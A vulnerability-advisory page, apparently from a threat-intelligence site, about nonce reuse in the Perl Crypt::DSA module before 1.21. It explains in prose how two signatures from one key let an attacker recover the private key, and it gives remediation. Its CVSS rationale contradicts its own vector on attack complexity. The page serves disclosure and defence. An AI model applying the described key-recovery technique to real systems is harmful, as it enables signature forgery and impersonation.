GHSA-88g7-87jg-w4q9
Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Network-observable signatures enable unauthenticated key recovery; AC:H because attacker must collect multiple signatures and perform cryptanalytic computation; full C/I impact from private key exposure and signature forgery.
Primary rating from Vendor (CNA).
CVSS VectorVendor
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Lifecycle Timeline
2Description PRE-NVD
AnalysisAI
Private-key recovery is possible in Crypt::DSA for Perl (all versions before 1.21) because the module caches the per-signature DSA nonce (k) inside the Key object and never clears it, causing every call to sign() after the first to reuse the identical nonce and produce signatures with matching r values. Any attacker who can observe two or more DSA signatures produced by the same Key object can apply well-known algebraic techniques to recover the private key entirely, after which they can forge arbitrary signatures. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires that a Crypt::DSA Key object be used to call sign() at least twice within the same process lifetime without being reconstructed between calls - this is the condition that triggers nonce reuse and produces two signatures with identical r values. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | No NVD-assigned CVSS vector is available, so risk signals are limited to the advisory text, CWE classification, and independent metric assessment. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker monitors the DSA-signed outputs of a Perl application that uses Crypt::DSA - for example, signed API responses, signed software packages, or authentication tokens. After collecting any two signatures produced by the same key (identifiable by matching r values in the signature pairs), the attacker applies the standard two-signature nonce-recovery formula to algebraically derive the private key in milliseconds. … |
| Remediation | Vendor-released patch: Crypt-DSA 1.21, available on CPAN and documented in the changelog at https://metacpan.org/release/TIMLEGGE/Crypt-DSA-1.21/changes. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Identify all systems using Crypt::DSA and determine which signing keys have been reused for multiple signature operations. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Same weakness CWE-323 – Reusing a Nonce, Key Pair in Encryption
View allSame technique Information Disclosure
View allVendor StatusVendor
Share
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-37016